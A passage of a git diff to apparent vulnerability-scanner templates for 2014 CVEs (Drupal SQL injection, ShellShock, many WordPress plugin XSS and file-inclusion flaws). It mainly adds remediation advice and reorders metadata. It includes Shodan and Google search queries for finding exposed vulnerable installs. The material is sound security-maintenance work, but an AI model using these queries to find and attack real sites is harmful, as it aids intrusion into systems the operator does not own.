cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elasticsearch diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 9359e064eb..09e2e4550f 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. + remediation: | + Apply the latest firmware update provided by Seagate to patch the command injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-3206 - https://www.exploit-db.com/exploits/33159 @@ -15,8 +17,8 @@ info: cve-id: CVE-2014-3206 cwe-id: CWE-20 epss-score: 0.54379 - cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.9718 + cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 vendor: seagate diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 6b9ecad336..ae1be6b91c 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -5,6 +5,7 @@ info: author: princechaddha severity: high description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys. + remediation: Upgrade to Drupal core 7.32 or later. reference: - https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql - https://nvd.nist.gov/vuln/detail/CVE-2014-3704 @@ -13,20 +14,19 @@ info: - https://www.exploit-db.com/exploits/34992 - https://www.exploit-db.com/exploits/34993 - https://www.exploit-db.com/exploits/35150 - remediation: Upgrade to Drupal core 7.32 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2014-3704 cwe-id: CWE-89 epss-score: 0.97529 - cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* epss-percentile: 0.99982 + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"drupal" vendor: drupal product: drupal + shodan-query: http.component:"drupal" tags: edb,cve,cve2014,drupal,sqli variables: num: "999999999" diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index dc4864b55f..f8682b9864 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path. + remediation: | + Upgrade to a patched version of the st module or use an alternative module that is not vulnerable to directory traversal. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-3744 - https://github.com/advisories/GHSA-69rr-wvh9-6c4q @@ -17,8 +19,8 @@ info: cve-id: CVE-2014-3744 cwe-id: CWE-22 epss-score: 0.00672 - cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* epss-percentile: 0.77222 + cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nodejs diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 13117da1e6..ed1cc09291 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services. + remediation: | + Apply the latest patches and updates provided by Oracle to fix the SSRF vulnerability reference: - https://www.oracle.com/security-alerts/cpujul2014.html - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 @@ -17,8 +19,8 @@ info: cve-id: CVE-2014-4210 cwe-id: NVD-CWE-noinfo epss-score: 0.96955 - cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:* epss-percentile: 0.99613 + cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 250e6a7d11..bd377386a4 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter. + remediation: | + Upgrade to a patched version of ActiveHelper LiveHelp Server or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4513 - http://codevigilant.com/disclosure/wp-plugin-activehelper-livehelp-a3-cross-site-scripting-xss @@ -14,14 +16,14 @@ info: cve-id: CVE-2014-4513 cwe-id: CWE-79 epss-score: 0.00145 - cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* epss-percentile: 0.49694 + cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/activehelper-livehelp" - framework: wordpress vendor: activehelper product: activehelper_livehelp_live_chat + framework: wordpress + google-query: inurl:"/wp-content/plugins/activehelper-livehelp" tags: cve,cve2014,wordpress,xss,wp-plugin http: diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index b7e712c7e9..8f2d0fe455 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. + remediation: | + Update to the latest version of the Import Legacy Media plugin (0.1 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 @@ -15,13 +17,13 @@ info: cve-id: CVE-2014-4535 cwe-id: CWE-79 epss-score: 0.00135 - cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47998 + cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: import_legacy_media_project product: import_legacy_media + framework: wordpress tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth http: diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 9e3829c22f..58b5bfde91 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. + remediation: | + Upgrade Infusionsoft Gravity Forms Add-on to version 1.5.7 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 @@ -16,14 +18,14 @@ info: cve-id: CVE-2014-4536 cwe-id: CWE-79 epss-score: 0.00149 - cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* epss-percentile: 0.50284 + cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" - framework: wordpress vendor: katz product: infusionsoft_gravity_forms + framework: wordpress + google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth http: diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 473d56007d..4dc93cd1e0 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. + remediation: | + Upgrade to a patched version of the Movies plugin (version 0.7 or above) that addresses the XSS vulnerability. reference: - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304 - https://nvd.nist.gov/vuln/detail/CVE-2014-4539 @@ -15,13 +17,13 @@ info: cve-id: CVE-2014-4539 cwe-id: CWE-79 epss-score: 0.00135 - cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47998 + cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: movies_project product: movies + framework: wordpress tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth http: diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index 0f3405a8a9..d367d7a6ce 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability. + remediation: | + Update to the latest version of the Podcast Channels plugin (0.28 or higher) to fix this vulnerability. reference: - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb - https://nvd.nist.gov/vuln/detail/CVE-2014-4544 @@ -15,13 +17,13 @@ info: cve-id: CVE-2014-4544 cwe-id: CWE-79 epss-score: 0.00118 - cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45006 + cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: podcast_channels_project product: podcast_channels + framework: wordpress tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth http: diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 56f0d0c017..50c9d3dacb 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter. + remediation: | + Update to the latest version of the Shortcode Ninja plugin (1.4 or higher) to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0 - https://nvd.nist.gov/vuln/detail/CVE-2014-4550 @@ -15,14 +17,14 @@ info: cve-id: CVE-2014-4550 cwe-id: CWE-79 epss-score: 0.00135 - cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47998 + cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/shortcode-ninja" - framework: wordpress vendor: visualshortcodes product: ninja + framework: wordpress + google-query: inurl:"/wp-content/plugins/shortcode-ninja" tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth http: diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 901bacfee3..41fdb0aff0 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter. + remediation: | + Update to WooCommerce Swipe plugin version 2.7.2 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301 - https://nvd.nist.gov/vuln/detail/CVE-2014-4558 @@ -15,13 +17,13 @@ info: cve-id: CVE-2014-4558 cwe-id: CWE-79 epss-score: 0.00135 - cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47998 + cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: cybercompany product: swipehq-payment-gateway-woocommerce + framework: wordpress tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce,unauth http: diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index 30fad1edf3..f7e87c7031 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability. + remediation: | + Upgrade to a patched version of the Ultimate Weather Plugin that addresses the XSS vulnerability. reference: - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d - https://nvd.nist.gov/vuln/detail/CVE-2014-4561 @@ -15,13 +17,13 @@ info: cve-id: CVE-2014-4561 cwe-id: CWE-79 epss-score: 0.00098 - cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* epss-percentile: 0.40032 + cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: ultimate-weather_project product: ultimate-weather + framework: wordpress tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth http: diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 48df6c1f55..1a1b7a6c3f 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter. + remediation: | + Update to the latest version of WP Planet plugin (0.1 or higher) or apply the vendor-supplied patch to fix the vulnerability. reference: - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3 - https://nvd.nist.gov/vuln/detail/CVE-2014-4592 @@ -16,14 +18,14 @@ info: cve-id: CVE-2014-4592 cwe-id: CWE-79 epss-score: 0.00135 - cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47998 + cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:* metadata: - google-query: inurl:"/wp-content/plugins/wp-planet" max-request: 2 - framework: wordpress vendor: czepol product: wp-planet + framework: wordpress + google-query: inurl:"/wp-content/plugins/wp-planet" tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve,unauth http: diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index b2063f1f48..1840287d97 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. + remediation: | + Update to the latest version of the Tera Charts plugin to fix the local file inclusion vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4940 - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail= @@ -15,14 +17,14 @@ info: cve-id: CVE-2014-4940 cwe-id: CWE-22 epss-score: 0.03891 - cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* epss-percentile: 0.90789 + cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/tera-charts" - framework: wordpress vendor: tera_charts_plugin_project product: tera-charts + framework: wordpress + google-query: inurl:"/wp-content/plugins/tera-charts" tags: cve,cve2014,wordpress,wp-plugin,lfi http: diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index fa531125a7..f668c8fa04 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. + remediation: | + Upgrade to WordPress EasyCart version 2.0.6 or later. reference: - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150 - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure @@ -18,13 +20,13 @@ info: cve-id: CVE-2014-4942 cwe-id: CWE-200 epss-score: 0.01024 - cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* epss-percentile: 0.81955 + cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: levelfourdevelopment product: wp-easycart + framework: wordpress tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure http: diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index 0bfb089b37..b9393b690a 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. + remediation: | + Apply the latest patches and updates provided by the vendor to fix the local file inclusion vulnerability in Fonality trixbox. reference: - https://www.exploit-db.com/exploits/39351 - https://nvd.nist.gov/vuln/detail/CVE-2014-5111 @@ -15,8 +17,8 @@ info: cve-id: CVE-2014-5111 cwe-id: CWE-22 epss-score: 0.0445 - cpe: cpe:2.3:a:netfortris:trixbox:-:*:*:*:*:*:*:* epss-percentile: 0.91352 + cpe: cpe:2.3:a:netfortris:trixbox:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netfortris diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 073c8176a6..34b7f96890 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. + remediation: | + Upgrade to a patched version of webEdition or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-5258 - https://www.exploit-db.com/exploits/34761 @@ -17,8 +19,8 @@ info: cve-id: CVE-2014-5258 cwe-id: CWE-22 epss-score: 0.01386 - cpe: cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:* epss-percentile: 0.84675 + cpe: cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: webedition diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 04e9cf3415..7940e9db3d 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. + remediation: | + Update to the latest version of the WP Content Source Control plugin to fix the directory traversal vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-5368 - https://www.exploit-db.com/exploits/39287 @@ -16,14 +18,14 @@ info: cve-id: CVE-2014-5368 cwe-id: CWE-22 epss-score: 0.08268 - cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:* epss-percentile: 0.93532 + cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/wp-source-control" - framework: wordpress vendor: wp_content_source_control_project product: wp_content_source_control + framework: wordpress + google-query: inurl:"/wp-content/plugins/wp-source-control" tags: cve,cve2014,wordpress,wp-plugin,lfi,edb,seclists http: diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index e9b18dcd77..6221e4c4db 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -5,6 +5,8 @@ info: author: pentest_swissky,0xelkomy severity: critical description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock. + remediation: | + Apply the necessary patches and updates provided by the vendor to fix the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-6271 - https://nvd.nist.gov/vuln/detail/CVE-2014-7169 @@ -17,8 +19,8 @@ info: cve-id: CVE-2014-6271 cwe-id: CWE-78 epss-score: 0.97566 - cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:* epss-percentile: 0.99997 + cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:* metadata: max-request: 8 vendor: gnu diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index 8aaa5d7bf8..b3cf6ac4ce 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Upgrade to the latest version of HTTP File Server (>=2.3c) to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287 - http://www.kb.cert.org/vuls/id/251276 @@ -18,14 +20,14 @@ info: cve-id: 'CVE-2014-6287' cwe-id: CWE-94 epss-score: 0.97289 - cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* epss-percentile: 0.99787 + cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:2124459909 verified: true + max-request: 1 vendor: rejetto product: http_file_server + shodan-query: http.favicon.hash:2124459909 tags: packetstorm,msf,cve,cve2014,hfs,rce,kev variables: str1: '{{rand_base(6)}}' diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index e812f8b67f..18c686dbd4 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php. + remediation: | + Upgrade to a patched version of Osclass (3.4.2 or later) to mitigate the vulnerability. reference: - https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html - https://nvd.nist.gov/vuln/detail/CVE-2014-6308 @@ -17,8 +19,8 @@ info: cve-id: CVE-2014-6308 cwe-id: CWE-22 epss-score: 0.0922 - cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* epss-percentile: 0.93887 + cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: osclass diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 5a61b9f4e3..5d4f4c111a 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SOPlanning <1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter. + remediation: | + Upgrade Simple Online Planning Tool to version 1.3.2 or higher to fix the Local File Inclusion vulnerability. reference: - https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html - https://www.exploit-db.com/exploits/37604/ @@ -18,8 +20,8 @@ info: cve-id: CVE-2014-8676 cwe-id: CWE-22 epss-score: 0.00195 - cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* epss-percentile: 0.56565 + cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: soplanning diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 6b33f10350..be78e830b2 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK,daffainfo severity: high description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. + remediation: | + Apply the latest security patches and updates provided by the Gogs project to mitigate the SQL Injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-8682 - http://seclists.org/fulldisclosure/2014/Nov/33 @@ -18,13 +20,13 @@ info: cve-id: CVE-2014-8682 cwe-id: CWE-89 epss-score: 0.00808 - cpe: cpe:2.3:a:gogits:gogs:*:*:*:*:*:*:*:* epss-percentile: 0.79567 + cpe: cpe:2.3:a:gogits:gogs:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"Sign In - Gogs" vendor: gogits product: gogs + shodan-query: title:"Sign In - Gogs" tags: gogs,seclists,packetstorm,edb,cve,cve2014,sqli http: diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 8586fec882..54d4b7f104 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. + remediation: | + Update to the latest version of DukaPress plugin (2.5.3 or higher) which contains a fix for this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-8799 - https://www.exploit-db.com/exploits/35346 @@ -17,14 +19,14 @@ info: cve-id: CVE-2014-8799 cwe-id: CWE-22 epss-score: 0.17844 - cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* epss-percentile: 0.9547 + cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/dukapress" - framework: wordpress vendor: dukapress product: dukapress + framework: wordpress + google-query: inurl:"/wp-content/plugins/dukapress" tags: cve,cve2014,wordpress,wp-plugin,lfi,edb http: diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index bfe13e09f4..6199cfa084 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter. + remediation: | + Update to the latest version of the WordPress DZS-VideoGallery Plugin, which includes a fix for this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-9094 - http://websecurity.com.ua/7152/ @@ -15,14 +17,14 @@ info: cve-id: 